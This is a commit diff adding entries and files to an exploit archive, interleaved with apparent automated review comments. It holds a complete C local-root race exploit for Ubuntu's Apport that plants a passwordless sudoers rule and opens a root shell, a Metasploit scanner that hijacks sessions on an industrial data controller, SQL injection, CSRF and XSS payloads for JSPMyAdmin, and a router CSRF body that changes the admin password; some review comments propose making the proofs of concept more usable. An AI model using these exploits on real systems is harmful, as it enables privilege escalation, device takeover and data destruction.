DB: 2015-05-30
17 new exploits
parent
3f78695204
commit
0b3f393d50
18 changed files with 799 additions and 0 deletions
17
files.csv
|
@ -33457,6 +33457,7 @@ id,file,description,date,author,platform,type,port
|
|||
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
|
||||
37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
|
||||
37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
|
||||
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,"John Page",jsp,webapps,80
|
||||
37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
|
||||
|
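Review bot: the row `37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,...` is inserted between 37074 and 37075, breaking the ascending id order that every other row in this hunk follows; move it to the end of the file next to the other 2015-05-29 rows (37151, 37154) so the next import does not have to special-case it.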
@ -33470,6 +33471,7 @@ id,file,description,date,author,platform,type,port
|
|||
37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0
|
||||
37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
|
||||
37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0
|
||||
37088,platforms/linux/local/37088.c,"Apport/Ubuntu - Local Root Race Condition",2015-05-23,rebel,linux,local,0
|
||||
37089,platforms/linux/local/37089.txt,"Fuse - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
|
||||
37090,platforms/php/webapps/37090.txt,"Joomla! JA T3 Framework Component Directory Traversal Vulnerability",2012-04-17,indoushka,php,webapps,0
|
||||
37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 'UserName' Parameter Cross Site Scripting Vulnerability",2012-04-17,"Aung Khant",php,webapps,0
|
||||
|
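Review bot: the 37088 row dates the exploit 2015-05-23, but the header of the added platforms/linux/local/37088.c says `# Date: 2015-05-11` (and its footer says 2015-05-10); if the csv date is meant to be the disclosure date rather than the import date, align the two. The description `"Apport/Ubuntu - Local Root Race Condition"` also omits the CVE that the exploit header carries (CVE-2015-1325); putting it in the description makes the row searchable by CVE.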
@ -33515,3 +33517,18 @@ id,file,description,date,author,platform,type,port
|
|||
37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0
|
||||
37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 'menu.php' Remote PHP Code Execution Vulnerability",2012-04-27,AkaStep,php,webapps,0
|
||||
37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting Vulnerability",2012-05-02,"Usman Saeed",hardware,webapps,0
|
||||
37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x 'photo.php' Server SQL Injection Vulnerability",2012-05-07,"Ramdan Yantu",php,webapps,0
|
||||
37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 'kw.dll' HTML Injection Vulnerability",2012-05-06,phocean,php,webapps,0
|
||||
37138,platforms/php/webapps/37138.txt,"Ramui Forum Script 'query' Parameter Cross Site Scripting Vulnerability",2012-05-07,3spi0n,php,webapps,0
|
||||
37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 'Login_form.php' Authentication Security Bypass Vulnerability",2012-05-07,L3b-r1'z,php,webapps,0
|
||||
37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 'banners.php' PHP Code Injection Vulnerability",2012-05-08,L3b-r1'z,php,webapps,0
|
||||
37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router Cross-Site Request Forgery Vulnerability",2012-05-08,Kalashinkov3,hardware,remote,0
|
||||
37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC plugins/ajaxCalls/haltResumeHsp.php hspSummaryId Parameter SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC plugins/ajaxCalls/haltResumeHsp.php newHspStatus Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC templates/hrfunct/emppop.php sortOrder1 Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC index.php uri Parameter XSS",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 'ajaxhelper.php' Cross Site Scripting Vulnerability",2012-05-09,"High-Tech Bridge SA",php,webapps,0
|
||||
37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 Upload/engine.php v Parameter XSS",2012-05-10,AkaStep,php,webapps,0
|
||||
37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
|
||||
37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
|
||||
37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
|
||||
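Review bot: several classifications in this hunk do not match the file contents. 37137 (`Schneider Electric Telecontrol Kerweb ... 'kw.dll' HTML Injection`) is filed as php/webapps although the endpoint is a Windows DLL, and 37141 (`Linksys WRT54GL Wireless Router Cross-Site Request Forgery`) is filed as hardware/remote although the attack targets the router's web UI; 37135 (iGuard firmware XSS) already uses hardware/webapps, which is the precedent to follow for both. The port column is also inconsistent: 37151 and 37154 carry 80 while every other webapps row here carries 0.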
7
platforms/hardware/remote/37141.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/53427/info
|
||||
|
||||
The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.
|
||||
|
||||
submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1
|
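Review bot: the PoC is a bare parameter string (`submit_button=Management&change_action=&action=Apply&PasswdModify=1&...`) with no target path, HTTP method or host, so a reader cannot tell where it is sent or how a victim's browser is made to send it. Add the target URI and a minimal auto-submitting form, as 37140.html in this commit does, or at least state that this is the POST body of the Management page's Apply request. It is also worth spelling out that the body sets `http_passwd` and `http_passwdConfirm`, i.e. a successful CSRF changes the admin password, which is the concrete impact the prose only hints at.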
167
platforms/hardware/webapps/37154.rb
Executable file
|
@ -0,0 +1,167 @@
|
|||
=begin
|
||||
# Exploit Title: ESC 8832 Data Controller multiple vulnerabilities
|
||||
# Date: 2014-05-29
|
||||
# Platform: SCADA / Web Application
|
||||
# Exploit Author: Balazs Makany
|
||||
# Vendor Homepage: www.envirosys.com
|
||||
# Version: ESC 8832 Data Controller Hardware
|
||||
# Tested on: ESC 8832 Data Controller Hardware
|
||||
# CVE : N/A (Yet)
|
||||
|
||||
POC for session hijacking: From the attacker browser (unauthenticated),
|
||||
simply enter the following URL:
|
||||
http://IP_of_the_Device/escmenu.esp?sessionid=1&menuid=6 and increment the
|
||||
sessionid parameter, starting from 1 up until it makes sense.
|
||||
|
||||
POC (and other vulns as well) was confirmed by the vendor
|
||||
Metasploit auxiliary module available at
|
||||
https://www.th3r3g3nt.com/public_files/esc_8832_session.rb
|
||||
|
||||
Details
|
||||
[1] Insecure user session handling (Session Hijacking)
|
||||
Summary: This vulnerability allows an attacker to hijack a valid session
|
||||
that is in progress by a legitimate user.
|
||||
Details: Due to the predictable session generation and due to the lack of
|
||||
cookie based authentication in the web interface, it was confirmed that an
|
||||
attacker from a different source IP address can issue valid requests,
|
||||
impersonating the authenticated user. The attack complexity is very low, no
|
||||
special software is required. It was noted that valid sessions do time out
|
||||
after certain period of inactivity, however hijacked sessions can
|
||||
elongating the session validity.
|
||||
Impact: The attacker can bypass intended access restrictions and
|
||||
impersonate currently active users, including administrators. Successful
|
||||
exploitation will result in complete loss of control over the device, and
|
||||
may depend on the compromised user context.
|
||||
POC: From a browser, simply enter the following URL:
|
||||
http://IP_of_the_Device/escmenu.esp?sessionid=1&menuid=6 and modify the
|
||||
sessionid parameter, starting from 1 up until it makes sense. Typically 15
|
||||
is high enough.
|
||||
|
||||
[2] Insecure user session generation (Predictable user session generation)
|
||||
Summary: This vulnerability aids attackers to perform session hijacking
|
||||
Details: Upon successful authentication, the generated session ID are
|
||||
sequential in nature and starts at 1. For example if no user is
|
||||
authenticated, the first user who authenticates will receive the session ID
|
||||
1. The next authenticated user will receive session ID 2 and so on. There
|
||||
is also seems to be a “read-only” / unknown behavior when user ID 0 is
|
||||
supplied. Negative, invalid and other fuzzable values were not tested.
|
||||
Impact: Successful exploitation will allow remote attackers to determine
|
||||
valid sessions, leading to session hijacking and can result in complete
|
||||
loss of control over the device.
|
||||
POC: N/A, confirmed by vendor
|
||||
|
||||
[3] Insecure user authentication method (Unencrypted protocol)
|
||||
Summary: This vulnerability allows man-in-the-middle attackers to gain
|
||||
valid cleartext credentials
|
||||
Details: The device is only capable of HTTP based authentication, which
|
||||
doesn’t seem to offer encryption such as HTTPS. Note that the native
|
||||
end-point client shipped with the device was not tested.
|
||||
Impact: Man-in-the-middle attackers are able to sniff cleartext
|
||||
authentication credentials between the user and the device. Successful
|
||||
exploitation may result in partial or complete loss of control over the
|
||||
device, depending on the compromised user context.
|
||||
POC: N/A, see web interface open ports and protocols
|
||||
|
||||
[4] Insecure user management (Lack of user names)
|
||||
Summary: This vulnerability significantly decreases the complexity
|
||||
requirements for bruteforce attacks
|
||||
Details: The web interface does not require a username to be entered in
|
||||
conjunction with the password; only the password drives the user role.
|
||||
Impact: Attackers can have significantly higher success rate for password
|
||||
bruteforcing. Successful exploitation may result in partial or complete
|
||||
loss of control over the device, depending on the compromised user context.
|
||||
POC: N/A, confirmed by vendor, inspect login screen
|
||||
|
||||
[5] Insecure user session token transmission (Session token in HTTP GET)
|
||||
Summary: Session tokens are transmitted via HTTP GET request in unhashed
|
||||
form
|
||||
Details: Upon successful authentication, the session ID is being sent in
|
||||
the URL GET request. (http[nolink]://
|
||||
192.168.1.1/escmenu.esp?sessionid=1&menuid=6)
|
||||
Impact: Man-in-the-middle attackers and caching devices (proxies, routers
|
||||
with spanning ports, loggers, browser history, IDS/IPS etc.) can
|
||||
effectively capture valid session IDs. The session ID transmitted in the
|
||||
GET request is vulnerable to session hijacking. Successful exploitation may
|
||||
result in partial or complete loss of control over the device, depending on
|
||||
the compromised user context.
|
||||
POC: N/A, confirmed by vendor
|
||||
=end
|
||||
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'ESC 8832 Data Controller Session Hijack Scanner',
|
||||
'Description' => %q{ This module detects if an active session is present and hijackable on the target ESC 8832 web interface.},
|
||||
'Author' => ['Balazs Makany'],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.th3r3g3nt.com/?p=28'],
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options([
|
||||
Opt::RPORT(80),
|
||||
OptBool.new('STOP_ON_SUCCESS', [true, "Stop when a live session was found", true]),
|
||||
])
|
||||
deregister_options('RHOST')
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
result = []
|
||||
begin
|
||||
('1'.. '15').each do |u|
|
||||
print_status("Scanning #{target_host} - with Session ID '#{u}'")
|
||||
|
||||
#Just to be on the safe side here.
|
||||
sleep(1)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/escmenu.esp?sessionid='+u+'&menuid=6',
|
||||
'method' => 'GET',
|
||||
'headers' => { 'Connection' => 'Close' }
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200 and res.body)
|
||||
if res.body.match(/(Configuration\sMenu)/im)
|
||||
print_good("#{target_host} - Active Session found as #{u}!")
|
||||
print_good("Complete request: http://#{target_host}/escmenu.esp?sessionid=#{u}&menuid=6")
|
||||
report_vuln(
|
||||
{
|
||||
:host => target_host,
|
||||
:port => datastore['RPORT'],
|
||||
:name => "ESC 8832 Web Vulnerability",
|
||||
:info => "Module #{self.fullname} confirmed a valid session (#{u}) on the ESC 8832 Web Interface",
|
||||
}
|
||||
)
|
||||
break if datastore['STOP_ON_SUCCESS']
|
||||
end
|
||||
if res.body.match(/(Access\sDenied!)/im)
|
||||
print_status(" Dead session")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("Timeout or no connection on #{rhost}:#{rport}")
|
||||
return
|
||||
rescue ::Exception => e
|
||||
print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
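Review bot: the header says `# Date: 2014-05-29` while files.csv and the rest of the write-up say 2015-05-29; fix the year. In the module, `result = []` is never used, `report_vuln` passes no `:refs`, so the stored finding cannot be tied back to the advisory URL already listed under 'References', and the session range `('1'.. '15')` is hard-coded even though the write-up says session id 0 shows a distinct 'read-only' behaviour and that 15 is only 'typically' enough; expose the upper bound as an OptInt and decide explicitly whether 0 is in scope. Minor: `rescue ::Exception => e` also catches `SystemExit` and friends; `StandardError` is sufficient here since `::Interrupt` is already re-raised above it.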
157
platforms/jsp/webapps/37152.txt
Executable file
|
@ -0,0 +1,157 @@
|
|||
# Exploit Title: JSPMyAdmin 1.1 SQL Injection, CSRF & XSS
|
||||
# Google Dork: intitle:SQL Injection
|
||||
# Date: 2015-05-29
|
||||
# Exploit Author: John Page (hyp3rlinx)
|
||||
# Website: hyp3rlinx.altervista.org/
|
||||
# Vendor Homepage: https://code.google.com/p/jsp-myadmin/
|
||||
# Software Link: https://code.google.com/p/jsp-myadmin/
|
||||
# Version: 1.1
|
||||
# Tested on: windows 7
|
||||
# Category: webapps
|
||||
|
||||
Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/AS-JSPMYADMIN0529.txt
|
||||
|
||||
|
||||
Product:
|
||||
JSPAdmin 1.1 is a Java web based MySQL database management system.
|
||||
|
||||
|
||||
Advisory Information:
|
||||
================================================
|
||||
JSPMyAdmin 1.1 SQL Injection, CSRF & XSS Vulnerabilities
|
||||
|
||||
|
||||
SQL Injection
|
||||
CSRF
|
||||
XSS
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
SQL Injection:
|
||||
deletedata.jsp is supposed to delete 1 field per query, yet we can control
|
||||
the SQL and build an OR condition.
|
||||
Problem is application uses concatenated user input to build SQL statements
|
||||
even though paramaterized queries are used.
|
||||
|
||||
In deletedata.jsp we find the following code:
|
||||
|
||||
con.prepareStatement("DELETE FROM " + table + " WHERE "+ field + "='" + val
|
||||
+"'");
|
||||
|
||||
So expected SQL to be run is this deleting 1 record.
|
||||
|
||||
e.g.
|
||||
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7
|
||||
|
||||
But the SQL Injection vulnerability lets us instead drop all fields using
|
||||
an SQL 'OR' statement.
|
||||
|
||||
e.g.
|
||||
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID
|
||||
or 'field'='NAME'
|
||||
|
||||
*************************************************************************************************
|
||||
|
||||
|
||||
CSRF:
|
||||
We can drop any database by sending victim malicious linx as there is no
|
||||
CSRF token used.
|
||||
*****************************************************************************************
|
||||
|
||||
|
||||
XSS:
|
||||
|
||||
There is zero user input checks allowing remote attackers to execute
|
||||
arbitrary scripts in the
|
||||
context of an authenticated user's browser session.
|
||||
***************************************************
|
||||
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
SQL Injection POC:
|
||||
------------------
|
||||
|
||||
So expected SQL to be run is this deleting 1 record
|
||||
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7
|
||||
http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID
|
||||
or 'field'='NAME'
|
||||
|
||||
|
||||
CSRF POC:
|
||||
---------
|
||||
http://127.0.0.1:8081/JSPMyAdmin/drop.jsp?db=mydb
|
||||
|
||||
|
||||
|
||||
XSS(s) POC:
|
||||
----------
|
||||
|
||||
1- </title><script>alert('XSS By hyp3rlinx');</script><title>
|
||||
Using POST method in 'host' parameter of login page.
|
||||
http://127.0.0.1:8081/JSPMyAdmin/
|
||||
|
||||
2- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=localhost&db=
|
||||
"/><script>alert(666)</script>
|
||||
|
||||
3- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=
|
||||
"/><script>alert(666)</script>&db=
|
||||
|
||||
4- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?db=
|
||||
"/><script>alert(666);</script>
|
||||
|
||||
5-
|
||||
http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=localhost&db=mysql&table=
|
||||
"/><script>alert(666);</script>
|
||||
|
||||
6- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=
|
||||
"/><script>alert(666);</script>&db=
|
||||
|
||||
7- http://127.0.0.1:8081/JSPMyAdmin/query.jsp?server=
|
||||
"/><script>alert(666)</script>&db=
|
||||
|
||||
8- http://127.0.0.1:8081/JSPMyAdmin/export.jsp?db=test&table=
|
||||
<script>alert(666)</script>
|
||||
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=========================================================
|
||||
|
||||
|
||||
Vendor Notification: NA
|
||||
May 29, 2015: Public Disclosure
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
=========================================================
|
||||
High
|
||||
|
||||
|
||||
|
||||
Description:
|
||||
==========================================================
|
||||
|
||||
Request Method(s):
|
||||
[+] GET / POST
|
||||
|
||||
Vulnerable Product:
|
||||
[+] JSPMyAdmin 1.1
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] host, server, db, table
|
||||
|
||||
Affected Area(s):
|
||||
[+] Entire admin
|
||||
|
||||
===============================================================
|
||||
|
||||
(hyp3rlinx)
|
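Review bot: the SQL injection PoC (`deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME'`) drops the `val` parameter entirely, so the statement the server builds from `con.prepareStatement("DELETE FROM " + table + " WHERE "+ field + "='" + val +"'")` is never shown and the reader has to guess how the trailing `='...'` is completed; print the resulting query. The explanation 'concatenated user input to build SQL statements even though paramaterized queries are used' is misleading: `prepareStatement` on a concatenated string binds nothing, so no parameterisation is in play, and 'drop all fields' should read 'delete all rows'. `# Google Dork: intitle:SQL Injection` is not a dork for this product and should go, and the CSRF section should say that `drop.jsp?db=mydb` only succeeds when the victim holds an authenticated JSPMyAdmin session.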
248
platforms/linux/local/37088.c
Executable file
|
@ -0,0 +1,248 @@
|
|||
/*
|
||||
# Exploit Title: apport/ubuntu local root race condition
|
||||
# Date: 2015-05-11
|
||||
# Exploit Author: rebel
|
||||
# Version: ubuntu 14.04, 14.10, 15.04
|
||||
# Tested on: ubuntu 14.04, 14.10, 15.04
|
||||
# CVE : CVE-2015-1325
|
||||
|
||||
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||
CVE-2015-1325 / apport-pid-race.c
|
||||
apport race conditions
|
||||
|
||||
ubuntu local root
|
||||
tested on ubuntu server 14.04, 14.10, 15.04
|
||||
|
||||
core dropping bug also works on older versions, but you can't
|
||||
write arbitrary contents. on 12.04 /etc/logrotate.d might work,
|
||||
didn't check. sudo and cron will complain if you drop a real ELF
|
||||
core file in sudoers.d/cron.d
|
||||
|
||||
unpriv@ubuntu-1504:~$ gcc apport-race.c -o apport-race && ./apport-race
|
||||
created /var/crash/_bin_sleep.1002.crash
|
||||
crasher: my pid is 1308
|
||||
apport stopped, pid = 1309
|
||||
getting pid 1308
|
||||
current pid = 1307..2500..5000..7500..10000........
|
||||
** child: current pid = 1308
|
||||
** child: executing /bin/su
|
||||
Password: sleeping 2s..
|
||||
|
||||
checker: mode 4532
|
||||
waiting for file to be unlinked..writing to fifo
|
||||
fifo written.. wait...
|
||||
waiting for /etc/sudoers.d/core to appear..
|
||||
|
||||
checker: new mode 32768 .. done
|
||||
checker: SIGCONT
|
||||
checker: writing core
|
||||
checker: done
|
||||
success
|
||||
# id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
|
||||
85ad63cf7248d7da46e55fa1b1c6fe01dea43749
|
||||
2015-05-10
|
||||
%rebel%
|
||||
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||
*/
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <sys/types.h>
|
||||
#include <signal.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/stat.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
|
||||
char *crash_report = "ProblemType: Crash\nArchitecture: amd64\nCrashCounter: 0\nDate: Sat May 9 18:18:33 2015\nDistroRelease: Ubuntu 15.04\nExecutablePath: /bin/sleep\nExecutableTimestamp: 1415000653\nProcCmdline: sleep 1337\nProcCwd: /home/rebel\nProcEnviron:\n XDG_RUNTIME_DIR=<set>\nProcMaps:\n 00400000-00407000 r-xp 00000000 08:01 393307 /bin/sleep\nProcStatus:\n Name: sleep\nSignal: 11\nUname: Linux 3.19.0-15-generic x86_64\nUserGroups:\n_LogindSession: 23\nCoreDump: base64\n H4sICAAAAAAC/0NvcmVEdW1wAA==\n U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA==\n";
|
||||
/*
|
||||
last line is the stuff we write to the corefile
|
||||
|
||||
c = zlib.compressobj(9,zlib.DEFLATED,-zlib.MAX_WBITS)
|
||||
t = '# \x01\x02\x03\x04\n\n\nALL ALL=(ALL) NOPASSWD: ALL\n'
|
||||
# need some non-ASCII bytes so it doesn't turn into a str()
|
||||
# which makes apport fail with the following error:
|
||||
# os.write(core_file, r['CoreDump'])
|
||||
# TypeError: 'str' does not support the buffer interface
|
||||
t = bytes(t,'latin1')
|
||||
c.compress(t)
|
||||
a = c.flush()
|
||||
import base64
|
||||
base64.b64encode(a)
|
||||
|
||||
# b'U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA=='
|
||||
*/
|
||||
|
||||
int apport_pid;
|
||||
char report[128];
|
||||
|
||||
void steal_pid(int wanted_pid)
|
||||
{
|
||||
int x, pid;
|
||||
|
||||
pid = getpid();
|
||||
|
||||
fprintf(stderr,"getting pid %d\n", wanted_pid);
|
||||
fprintf(stderr,"current pid = %d..", pid);
|
||||
|
||||
for(x = 0; x < 500000; x++) {
|
||||
pid = fork();
|
||||
if(pid == 0) {
|
||||
pid = getpid();
|
||||
if(pid % 2500 == 0)
|
||||
fprintf(stderr,"%d..", pid);
|
||||
|
||||
if(pid == wanted_pid) {
|
||||
fprintf(stderr,"\n** child: current pid = %d\n", pid);
|
||||
fprintf(stderr,"** child: executing /bin/su\n");
|
||||
|
||||
execl("/bin/su", "su", NULL);
|
||||
}
|
||||
exit(0);
|
||||
return;
|
||||
}
|
||||
if(pid == wanted_pid)
|
||||
return;
|
||||
|
||||
wait(NULL);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
void checker(void)
|
||||
{
|
||||
struct stat s;
|
||||
int fd, mode, x;
|
||||
|
||||
stat(report, &s);
|
||||
|
||||
fprintf(stderr,"\nchecker: mode %d\nwaiting for file to be unlinked..", s.st_mode);
|
||||
|
||||
mode = s.st_mode;
|
||||
|
||||
while(1) {
|
||||
// poor man's pseudo-singlestepping
|
||||
kill(apport_pid, SIGCONT);
|
||||
kill(apport_pid, SIGSTOP);
|
||||
|
||||
// need to wait a bit for the signals to be handled,
|
||||
// otherwise we'll miss when the new report file is created
|
||||
for(x = 0; x < 100000; x++);
|
||||
|
||||
stat(report, &s);
|
||||
|
||||
if(s.st_mode != mode)
|
||||
break;
|
||||
}
|
||||
|
||||
fprintf(stderr,"\nchecker: new mode %d .. done\n", s.st_mode);
|
||||
|
||||
unlink(report);
|
||||
mknod(report, S_IFIFO | 0666, 0);
|
||||
|
||||
fprintf(stderr,"checker: SIGCONT\n");
|
||||
kill(apport_pid, SIGCONT);
|
||||
|
||||
fprintf(stderr,"checker: writing core\n");
|
||||
|
||||
fd = open(report, O_WRONLY);
|
||||
write(fd, crash_report, strlen(crash_report));
|
||||
close(fd);
|
||||
fprintf(stderr,"checker: done\n");
|
||||
|
||||
while(1)
|
||||
sleep(1);
|
||||
}
|
||||
|
||||
|
||||
|
||||
void crasher()
|
||||
{
|
||||
chdir("/etc/sudoers.d");
|
||||
|
||||
fprintf(stderr,"crasher: my pid is %d\n", getpid());
|
||||
|
||||
execl("/bin/sleep", "sleep", "1337", NULL);
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
int main(void)
|
||||
{
|
||||
int pid, checker_pid, fd;
|
||||
struct rlimit limits;
|
||||
struct stat s;
|
||||
|
||||
limits.rlim_cur = RLIM_INFINITY;
|
||||
limits.rlim_max = RLIM_INFINITY;
|
||||
setrlimit(RLIMIT_CORE, &limits);
|
||||
|
||||
pid = fork();
|
||||
|
||||
if(pid == 0)
|
||||
crasher();
|
||||
|
||||
sprintf(report, "/var/crash/_bin_sleep.%d.crash", getuid());
|
||||
|
||||
unlink(report);
|
||||
mknod(report, S_IFIFO | 0666, 0);
|
||||
|
||||
fprintf(stderr,"created %s\n", report);
|
||||
|
||||
usleep(300000);
|
||||
kill(pid, 11);
|
||||
apport_pid = pid + 1;
|
||||
// could check that pid+1 is actually apport here but it's
|
||||
// kind of likely
|
||||
fprintf(stderr,"apport stopped, pid = %d\n", apport_pid);
|
||||
|
||||
usleep(300000);
|
||||
|
||||
kill(pid, 9);
|
||||
steal_pid(pid);
|
||||
sleep(1);
|
||||
|
||||
kill(apport_pid, SIGSTOP);
|
||||
|
||||
checker_pid = fork();
|
||||
|
||||
if(checker_pid == 0) {
|
||||
checker();
|
||||
exit(0);
|
||||
}
|
||||
|
||||
fprintf(stderr,"sleeping 2s..\n");
|
||||
sleep(2);
|
||||
|
||||
fprintf(stderr,"writing to fifo\n");
|
||||
|
||||
fd = open(report, O_WRONLY);
|
||||
write(fd, crash_report, strlen(crash_report));
|
||||
close(fd);
|
||||
|
||||
fprintf(stderr,"fifo written.. wait...\n");
|
||||
fprintf(stderr,"waiting for /etc/sudoers.d/core to appear..\n");
|
||||
|
||||
while(1) {
|
||||
stat("/etc/sudoers.d/core", &s);
|
||||
if(s.st_size == 37)
|
||||
break;
|
||||
usleep(100000);
|
||||
}
|
||||
|
||||
fprintf(stderr,"success\n");
|
||||
kill(pid, 9);
|
||||
kill(checker_pid, 9);
|
||||
return system("sudo -- sh -c 'stty echo;sh -i'");
|
||||
}
|
